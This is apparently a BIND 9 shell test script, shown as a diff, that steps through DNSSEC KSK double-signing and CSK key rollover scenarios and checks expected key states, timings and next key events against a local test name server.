+# Iret(KSK): DS TTL (1h) + DprpP (1h) + retire-safety (2d)
+# Iret(KSK): 50h (180000 seconds)
+# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (1w) + retire-safety (2d)
+# Iret(ZSK): 10d1h (867600 seconds)
+Lksk=5184000
+Lzsk=31536000
+IretKSK=180000
+IretZSK=867600
+
+#
+# Zone: step1.ksk-doubleksk.autosign.
+#
+set_zone "step1.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "2" "7200"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "ksk"
+set_keylifetime "KEY1" "${Lksk}"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "no"
+
+key_clear "KEY2"
+set_keyrole "KEY2" "zsk"
+set_keylifetime "KEY2" "${Lzsk}"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "no"
+set_zonesigning "KEY2" "yes"
+# Both KSK (KEY1) and ZSK (KEY2) start in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+# Initially only two keys.
+key_clear "KEY3"
+key_clear "KEY4"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# These keys are immediately published and activated.
+rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor KSK needs to be published. That is
+# the KSK lifetime - prepublication time. The prepublication time is
+# DNSKEY TTL plus publish safety plus the zone propagation delay.
+# For the ksk-doubleksk policy that means: 60d - (1d3h) = 5086800 seconds.
+check_next_key_event 5086800
+
+#
+# Zone: step2.ksk-doubleksk.autosign.
+#
+set_zone "step2.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "3" "7200"
+set_server "ns3" "10.53.0.3"
+# New KSK (KEY3) is prepublished (and signs DNSKEY RRset).
+key_clear "KEY3"
+set_keyrole "KEY3" "ksk"
+set_keylifetime "KEY3" "${Lksk}"
+set_keyalgorithm "KEY3" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY3" "yes"
+set_zonesigning "KEY3" "no"
+# Key states.
+set_keystate "KEY1" "GOAL" "hidden"
+set_keystate "KEY3" "GOAL" "omnipresent"
+set_keystate "KEY3" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY3" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY3" "STATE_DS" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys were activated 1413 hours ago (5086800 seconds).
+rollover_predecessor_keytimes -5086800
+# - The new KSK is published now.
+created=$(key_get KEY3 CREATED)
+set_keytime "KEY3" "PUBLISHED" "${created}"
+# The new KSK should publish the CDS after the prepublication time.
+# TTLkey: 2h
+# DprpC: 1h
+# publish-safety: 1d
+# IpubC: 27h (97200 seconds)
+IpubC=97200
+set_addkeytime "KEY3" "SYNCPUBLISH" "${created}" "${IpubC}"
+set_addkeytime "KEY3" "ACTIVE" "${created}" "${IpubC}"
+set_retired_removed "KEY3" "${Lksk}" "${IretKSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor KSK becomes OMNIPRESENT. That is the
+# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For
+# the ksk-doubleksk policy, this means: 7200s + 1h + 1d = 97200 seconds.
+check_next_key_event 97200
+
+#
+# Zone: step3.ksk-doubleksk.autosign.
+#
+set_zone "step3.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "3" "7200"
+set_server "ns3" "10.53.0.3"
+
+# The DNSKEY RRset has become omnipresent.
+# Check keys before we tell named that we saw the DS has been replaced.
+set_keystate "KEY3" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY3" "STATE_KRRSIG" "omnipresent"
+# The old DS (KEY1) can be withdrawn and the new DS (KEY3) can be introduced.
+set_keystate "KEY1" "STATE_DS" "unretentive"
+set_keystate "KEY3" "STATE_DS" "rumoured"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# Check that CDS publication is logged.
+check_cdslog "$DIR" "$ZONE" KEY3
+
+# Set expected key times:
+# - The old keys were activated 60 days ago (5184000 seconds).
+rollover_predecessor_keytimes -5184000
+# - The new KSK is published 27 hours ago (97200 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -97200
+# - The new KSK CDS is published now.
+set_keytime "KEY3" "SYNCPUBLISH" "${created}"
+syncpub=$(key_get KEY3 SYNCPUBLISH)
+set_keytime "KEY3" "ACTIVE" "${syncpub}"
+set_retired_removed "KEY3" "${Lksk}" "${IretKSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# We ignore any parent registration delay, so set the DS publish time to now.
+rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE"
+rndc_checkds "$SERVER" "$DIR" KEY3 "now" "published" "$ZONE"
+# Next key event is when the predecessor DS has been replaced with the
+# successor DS and enough time has passed such that the all validators that
+# have this DS RRset cached only know about the successor DS. This is the
+# the retire interval, which is the parent propagation delay plus the DS TTL
+# plus the retire-safety. For the ksk-double-ksk policy this means:
+# 1h + 3600s + 2d = 2d2h = 180000 seconds.
+check_next_key_event 180000
+
+#
+# Zone: step4.ksk-doubleksk.autosign.
+#
+set_zone "step4.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "3" "7200"
+set_server "ns3" "10.53.0.3"
+# KSK (KEY1) DNSKEY can be removed.
+set_keysigning "KEY1" "no"
+set_keystate "KEY1" "STATE_DNSKEY" "unretentive"
+set_keystate "KEY1" "STATE_KRRSIG" "unretentive"
+set_keystate "KEY1" "STATE_DS" "hidden"
+# New KSK (KEY3) DS is now OMNIPRESENT.
+set_keystate "KEY3" "STATE_DS" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old keys were activated 1490 hours ago (5364000 seconds).
+rollover_predecessor_keytimes -5364000
+# - The new KSK is published 77 hours ago (277200 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -277200
+published=$(key_get KEY3 PUBLISHED)
+set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${IpubC}"
+syncpub=$(key_get KEY3 SYNCPUBLISH)
+set_keytime "KEY3" "ACTIVE" "${syncpub}"
+set_retired_removed "KEY3" "${Lksk}" "${IretKSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the DNSKEY enters the HIDDEN state. This is the
+# DNSKEY TTL plus zone propagation delay. For the ksk-doubleksk policy this is:
+# 7200s + 1h = 10800s
+check_next_key_event 10800
+
+#
+# Zone: step5.ksk-doubleksk.autosign.
+#
+set_zone "step5.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "3" "7200"
+set_server "ns3" "10.53.0.3"
+# KSK (KEY1) DNSKEY is now HIDDEN.
+set_keystate "KEY1" "STATE_DNSKEY" "hidden"
+set_keystate "KEY1" "STATE_KRRSIG" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - The old KSK is activated 1492 hours ago (5371200 seconds).
+rollover_predecessor_keytimes -5371200
+# - The new KSK is published 79 hours ago (284400 seconds).
+created=$(key_get KEY3 CREATED)
+set_addkeytime "KEY3" "PUBLISHED" "${created}" -284400
+published=$(key_get KEY3 PUBLISHED)
+set_addkeytime "KEY3" "SYNCPUBLISH" "${published}" "${IpubC}"
+syncpub=$(key_get KEY3 SYNCPUBLISH)
+set_keytime "KEY3" "ACTIVE" "${syncpub}"
+set_retired_removed "KEY3" "${Lksk}" "${IretKSK}"
+
+# Various signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the new successor needs to be published. This is the
+# KSK lifetime minus Ipub minus Iret minus DNSKEY TTL. For the
+# ksk-doubleksk this is: 60d - 1d3h - 1d - 2d2h - 2h =
+# 5184000 - 97200 - 180000 - 7200 = 4813200 seconds.
+check_next_key_event 4899600
+
+#
+# Zone: step6.ksk-doubleksk.autosign.
+#
+set_zone "step6.ksk-doubleksk.autosign"
+set_policy "ksk-doubleksk" "2" "7200"
+set_server "ns3" "10.53.0.3"
+# KSK (KEY1) DNSKEY is purged.
+key_clear "KEY1"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Testing CSK key rollover (1).
+#
+
+# Policy parameters.
+# Lcsk: 186 days (5184000 seconds)
+# Iret(KSK): DS TTL (1h) + DprpP (1h) + retire-safety (2h)
+# Iret(KSK): 4h (14400 seconds)
+# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (25d) + retire-safety (2h)
+# Iret(ZSK): 26d3h (2257200 seconds)
+Lcsk=16070400
+IretKSK=14400
+IretZSK=2257200
+IretCSK=$IretZSK
+
+csk_rollover_predecessor_keytimes() {
+ _addtime=$1
+
+ _created=$(key_get KEY1 CREATED)
+ set_addkeytime "KEY1" "PUBLISHED" "${_created}" "${_addtime}"
+ set_addkeytime "KEY1" "SYNCPUBLISH" "${_created}" "${_addtime}"
+ set_addkeytime "KEY1" "ACTIVE" "${_created}" "${_addtime}"
+ [ "$Lcsk" = 0 ] || set_retired_removed "KEY1" "${Lcsk}" "${IretCSK}"
+}
+
+#
+# Zone: step1.csk-roll.autosign.
+#
+set_zone "step1.csk-roll.autosign"
+set_policy "csk-roll" "1" "3600"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "${Lcsk}"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+# The CSK (KEY1) starts in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+# Initially only one key.
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# This key is immediately published and activated.
+csk_rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor CSK needs to be published.
+# This is Lcsk - Ipub - Dreg.
+# Lcsk: 186d (16070400 seconds)
+# Ipub: 3h (10800 seconds)
+check_next_key_event 16059600
+
+#
+# Zone: step2.csk-roll.autosign.
+#
+set_zone "step2.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# New CSK (KEY2) is prepublished (signs DNSKEY RRset, but not yet other RRsets).
+key_clear "KEY2"
+set_keyrole "KEY2" "csk"
+set_keylifetime "KEY2" "16070400"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "yes"
+set_zonesigning "KEY2" "no"
+# Key states.
+set_keystate "KEY1" "GOAL" "hidden"
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY2" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY2" "STATE_ZRRSIG" "hidden"
+set_keystate "KEY2" "STATE_DS" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4461 hours ago (16059600 seconds).
+csk_rollover_predecessor_keytimes -16059600
+# - The new CSK is published now.
+created=$(key_get KEY2 CREATED)
+set_keytime "KEY2" "PUBLISHED" "${created}"
+# - The new CSK should publish the CDS after the prepublication time.
+# Ipub: 3 hour (10800 seconds)
+Ipub="10800"
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}"
+set_addkeytime "KEY2" "ACTIVE" "${created}" "${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor CSK becomes OMNIPRESENT.
That is the
+# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For
+# the csk-roll policy, this means 3 hours = 10800 seconds.
+check_next_key_event 10800
+
+#
+# Zone: step3.csk-roll.autosign.
+#
+set_zone "step3.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# Swap zone signing role.
+set_zonesigning "KEY1" "no"
+set_zonesigning "KEY2" "yes"
+# CSK (KEY1) will be removed, so moving to UNRETENTIVE.
+set_keystate "KEY1" "STATE_ZRRSIG" "unretentive"
+# New CSK (KEY2) DNSKEY is OMNIPRESENT, so moving ZRRSIG to RUMOURED.
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced.
+set_keystate "KEY1" "STATE_DS" "unretentive"
+set_keystate "KEY2" "STATE_DS" "rumoured"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# Check that CDS publication is logged.
+check_cdslog "$DIR" "$ZONE" KEY2
+
+# Set expected key times:
+# - This key was activated 186 days ago (16070400 seconds).
+csk_rollover_predecessor_keytimes -16070400
+# - The new CSK is published three hours ago, CDS must be published now.
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" "-${Ipub}"
+set_keytime "KEY2" "SYNCPUBLISH" "${created}"
+# - Also signatures are being introduced now.
+set_keytime "KEY2" "ACTIVE" "${created}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+# Subdomain still has good signatures of old CSK (KEY1).
+# Set expected zone signing on for KEY1 and off for KEY2,
+# testing whether signatures which are still valid are being reused.
+set_zonesigning "KEY1" "yes"
+set_zonesigning "KEY2" "no"
+check_subdomain
+# Restore the expected zone signing properties.
+set_zonesigning "KEY1" "no"
+set_zonesigning "KEY2" "yes"
+dnssec_verify
+
+# We ignore any parent registration delay, so set the DS publish time to now.
+rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE"
+rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE"
+# Next key event is when the predecessor DS has been replaced with the
+# successor DS and enough time has passed such that the all validators that
+# have this DS RRset cached only know about the successor DS. This is the
+# the retire interval, which is the parent propagation delay plus the DS TTL
+# plus the retire-safety. For the csk-roll policy this means:
+# 1h + 1h + 2h = 4h = 14400 seconds.
+check_next_key_event 14400
+
+#
+# Zone: step4.csk-roll.autosign.
+#
+set_zone "step4.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) is no longer signing the DNSKEY RRset.
+set_keysigning "KEY1" "no"
+# The old CSK (KEY1) DS is hidden. We still need to keep the DNSKEY public
+# but can remove the KRRSIG records.
+set_keystate "KEY1" "STATE_KRRSIG" "unretentive"
+set_keystate "KEY1" "STATE_DS" "hidden"
+# The new CSK (KEY2) DS is now OMNIPRESENT.
+set_keystate "KEY2" "STATE_DS" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4468 hours ago (16084800 seconds).
+csk_rollover_predecessor_keytimes -16084800
+# - The new CSK started signing 4h ago (14400 seconds).
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "ACTIVE" "${created}" -14400
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -14400
+syncpub=$(key_get KEY2 SYNCPUBLISH)
+set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the KRRSIG enters the HIDDEN state.
This is the
+# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is:
+# 1h + 1h = 7200 seconds.
+check_next_key_event 7200
+
+#
+# Zone: step5.csk-roll.autosign.
+#
+set_zone "step5.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) KRRSIG records are now all hidden.
+set_keystate "KEY1" "STATE_KRRSIG" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4470 hours ago (16092000 seconds).
+csk_rollover_predecessor_keytimes -16092000
+# - The new CSK started signing 6h ago (21600 seconds).
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "ACTIVE" "${created}" -21600
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -21600
+syncpub=$(key_get KEY2 SYNCPUBLISH)
+set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the DNSKEY can be removed. This is when all ZRRSIG
+# records have been replaced with signatures of the new CSK. We have
+# calculated the interval to be 26d3h of which 4h (Iret(KSK)) plus
+# 2h (DNSKEY TTL + Dprp) have already passed. So next key event is in
+# 26d3h - 4h - 2h = 621h = 2235600 seconds.
+check_next_key_event 2235600
+
+#
+# Zone: step6.csk-roll.autosign.
+#
+set_zone "step6.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) ZRRSIG records are now all hidden (so the DNSKEY can
+# be removed).
+set_keystate "KEY1" "STATE_DNSKEY" "unretentive"
+set_keystate "KEY1" "STATE_ZRRSIG" "hidden"
+# The new CSK (KEY2) is now fully OMNIPRESENT.
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times
+# - This key was activated 5091 hours ago (18327600 seconds).
+csk_rollover_predecessor_keytimes -18327600
+# - The new CSK is activated 627 hours ago (2257200 seconds).
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "ACTIVE" "${created}" -2257200
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -2257200
+syncpub=$(key_get KEY2 SYNCPUBLISH)
+set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the DNSKEY enters the HIDDEN state. This is the
+# DNSKEY TTL plus zone propagation delay. For the csk-roll policy this is:
+# 1h + 1h = 7200 seconds.
+check_next_key_event 7200
+
+#
+# Zone: step7.csk-roll.autosign.
+#
+set_zone "step7.csk-roll.autosign"
+set_policy "csk-roll" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) is now completely HIDDEN.
+set_keystate "KEY1" "STATE_DNSKEY" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 5093 hours ago (18334800 seconds).
+csk_rollover_predecessor_keytimes -18334800
+# - The new CSK is activated 629 hours ago (2264400 seconds).
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "ACTIVE" "${created}" -2264400
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" -2264400
+syncpub=$(key_get KEY2 SYNCPUBLISH)
+set_addkeytime "KEY2" "PUBLISHED" "${syncpub}" "-${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the new successor needs to be published.
+# This is the Lcsk, minus time passed since the key started signing,
+# minus the prepublication time.
+# Lcsk: 186d (16070400 seconds)
+# Time passed: 629h (2264400 seconds)
+# Ipub: 3h (10800 seconds)
+check_next_key_event 13795200
+
+#
+# Zone: step8.csk-roll.autosign.
+#
+set_zone "step8.csk-roll.autosign"
+set_policy "csk-roll" "1" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) is purged.
+key_clear "KEY1"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+check_apex
+check_subdomain
+dnssec_verify
+
+#
+# Testing CSK key rollover (2).
+#
+
+# Policy parameters.
+# Lcsk: 186 days (16070400 seconds)
+# Dreg: N/A
+# Iret(KSK): DS TTL (1h) + DprpP (1w) + retire-safety (1h)
+# Iret(KSK): 170h (61200 seconds)
+# Iret(ZSK): RRSIG TTL (1d) + Dprp (1h) + Dsgn (12h) + retire-safety (1h)
+# Iret(ZSK): 38h (136800 seconds)
+Lcsk=16070400
+IretKSK=612000
+IretZSK=136800
+IretCSK=$IretKSK
+
+#
+# Zone: step1.csk-roll2.autosign.
+#
+set_zone "step1.csk-roll2.autosign"
+set_policy "csk-roll2" "1" "3600"
+set_server "ns3" "10.53.0.3"
+# Key properties.
+key_clear "KEY1"
+set_keyrole "KEY1" "csk"
+set_keylifetime "KEY1" "16070400"
+set_keyalgorithm "KEY1" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY1" "yes"
+set_zonesigning "KEY1" "yes"
+# The CSK (KEY1) starts in OMNIPRESENT.
+set_keystate "KEY1" "GOAL" "omnipresent"
+set_keystate "KEY1" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY1" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_ZRRSIG" "omnipresent"
+set_keystate "KEY1" "STATE_DS" "omnipresent"
+# Initially only one key.
+key_clear "KEY2"
+key_clear "KEY3"
+key_clear "KEY4"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# This key is immediately published and activated.
+csk_rollover_predecessor_keytimes 0
+check_keytimes
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor CSK needs to be published.
+# This is Lcsk - Ipub.
+# Lcsk: 186d (16070400 seconds)
+# Ipub: 3h (10800 seconds)
+# Total: 186d3h (16059600 seconds)
+check_next_key_event 16059600
+
+#
+# Zone: step2.csk-roll2.autosign.
+#
+set_zone "step2.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# New CSK (KEY2) is prepublished (signs DNSKEY RRset, but not yet other RRsets).
+key_clear "KEY2"
+set_keyrole "KEY2" "csk"
+set_keylifetime "KEY2" "16070400"
+set_keyalgorithm "KEY2" "$DEFAULT_ALGORITHM_NUMBER" "$DEFAULT_ALGORITHM" "$DEFAULT_BITS"
+set_keysigning "KEY2" "yes"
+set_zonesigning "KEY2" "no"
+# Key states.
+set_keystate "KEY1" "GOAL" "hidden"
+set_keystate "KEY2" "GOAL" "omnipresent"
+set_keystate "KEY2" "STATE_DNSKEY" "rumoured"
+set_keystate "KEY2" "STATE_KRRSIG" "rumoured"
+set_keystate "KEY2" "STATE_ZRRSIG" "hidden"
+set_keystate "KEY2" "STATE_DS" "hidden"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4461 hours ago (16059600 seconds).
+csk_rollover_predecessor_keytimes -16059600
+# - The new CSK is published now.
+created=$(key_get KEY2 CREATED)
+set_keytime "KEY2" "PUBLISHED" "${created}"
+# - The new CSK should publish the CDS after the prepublication time.
+# - Ipub: 3 hour (10800 seconds)
+Ipub="10800"
+set_addkeytime "KEY2" "SYNCPUBLISH" "${created}" "${Ipub}"
+set_addkeytime "KEY2" "ACTIVE" "${created}" "${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_apex
+check_subdomain
+dnssec_verify
+
+# Next key event is when the successor CSK becomes OMNIPRESENT. That is the
+# DNSKEY TTL plus the zone propagation delay, plus the publish-safety. For
+# the csk-roll2 policy, this means 3h hours = 10800 seconds.
+check_next_key_event 10800
+
+#
+# Zone: step3.csk-roll2.autosign.
+#
+set_zone "step3.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# CSK (KEY1) can be removed, so move to UNRETENTIVE.
+set_zonesigning "KEY1" "no"
+set_keystate "KEY1" "STATE_ZRRSIG" "unretentive"
+# New CSK (KEY2) DNSKEY is OMNIPRESENT, so move ZRRSIG to RUMOURED state.
+set_zonesigning "KEY2" "yes"
+set_keystate "KEY2" "STATE_DNSKEY" "omnipresent"
+set_keystate "KEY2" "STATE_KRRSIG" "omnipresent"
+set_keystate "KEY2" "STATE_ZRRSIG" "rumoured"
+# The old DS (KEY1) can be withdrawn and the new DS (KEY2) can be introduced.
+set_keystate "KEY1" "STATE_DS" "unretentive"
+set_keystate "KEY2" "STATE_DS" "rumoured"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+# Check that CDS publication is logged.
+check_cdslog "$DIR" "$ZONE" KEY2
+
+# Set expected key times:
+# - This key was activated 186 days ago (16070400 seconds).
+csk_rollover_predecessor_keytimes -16070400
+# - The new CSK is published three hours ago, CDS must be published now.
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" "-${Ipub}"
+set_keytime "KEY2" "SYNCPUBLISH" "${created}"
+# - Also signatures are being introduced now.
+set_keytime "KEY2" "ACTIVE" "${created}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
+check_keytimes
+check_apex
+# Subdomain still has good signatures of old CSK (KEY1).
+# Set expected zone signing on for KEY1 and off for KEY2,
+# testing whether signatures which are still valid are being reused.
+set_zonesigning "KEY1" "yes"
+set_zonesigning "KEY2" "no"
+check_subdomain
+# Restore the expected zone signing properties.
+set_zonesigning "KEY1" "no"
+set_zonesigning "KEY2" "yes"
+dnssec_verify
+
+# We ignore any parent registration delay, so set the DS publish time to now.
+rndc_checkds "$SERVER" "$DIR" KEY1 "now" "withdrawn" "$ZONE"
+rndc_checkds "$SERVER" "$DIR" KEY2 "now" "published" "$ZONE"
+# Next key event is when the predecessor ZRRSIG records have been replaced
+# with that of the successor and enough time has passed such that the all
+# validators that have such signed RRsets in cache only know about the
+# successor signatures. This is the retire interval: Dsgn plus the
+# maximum zone TTL plus the zone propagation delay plus retire-safety. For the
+# csk-roll2 policy that means: 12h (because 1d validity and refresh within
+# 12 hours) + 1d + 1h + 1h = 38h = 136800 seconds. Prevent intermittent false
+# positives on slow platforms by subtracting the number of seconds which
+# passed between key creation and invoking 'rndc dnssec -checkds'.
+now="$(TZ=UTC date +%s)"
+time_passed=$((now-start_time))
+next_time=$((136800-time_passed))
+check_next_key_event $next_time
+
+#
+# Zone: step4.csk-roll2.autosign.
+#
+set_zone "step4.csk-roll2.autosign"
+set_policy "csk-roll2" "2" "3600"
+set_server "ns3" "10.53.0.3"
+# The old CSK (KEY1) ZRRSIG is now HIDDEN.
+set_keystate "KEY1" "STATE_ZRRSIG" "hidden"
+# The new CSK (KEY2) ZRRSIG is now OMNIPRESENT.
+set_keystate "KEY2" "STATE_ZRRSIG" "omnipresent"
+
+# Various signing policy checks.
+check_keys
+check_dnssecstatus "$SERVER" "$POLICY" "$ZONE"
+
+# Set expected key times:
+# - This key was activated 4502 hours ago (16207200 seconds).
+csk_rollover_predecessor_keytimes -16207200
+# - The new CSK was published 41 hours (147600 seconds) ago.
+created=$(key_get KEY2 CREATED)
+set_addkeytime "KEY2" "PUBLISHED" "${created}" -147600
+published=$(key_get KEY2 PUBLISHED)
+set_addkeytime "KEY2" "SYNCPUBLISH" "${published}" "${Ipub}"
+set_addkeytime "KEY2" "ACTIVE" "${published}" "${Ipub}"
+set_retired_removed "KEY2" "${Lcsk}" "${IretCSK}"
+
+# Continue signing policy checks.
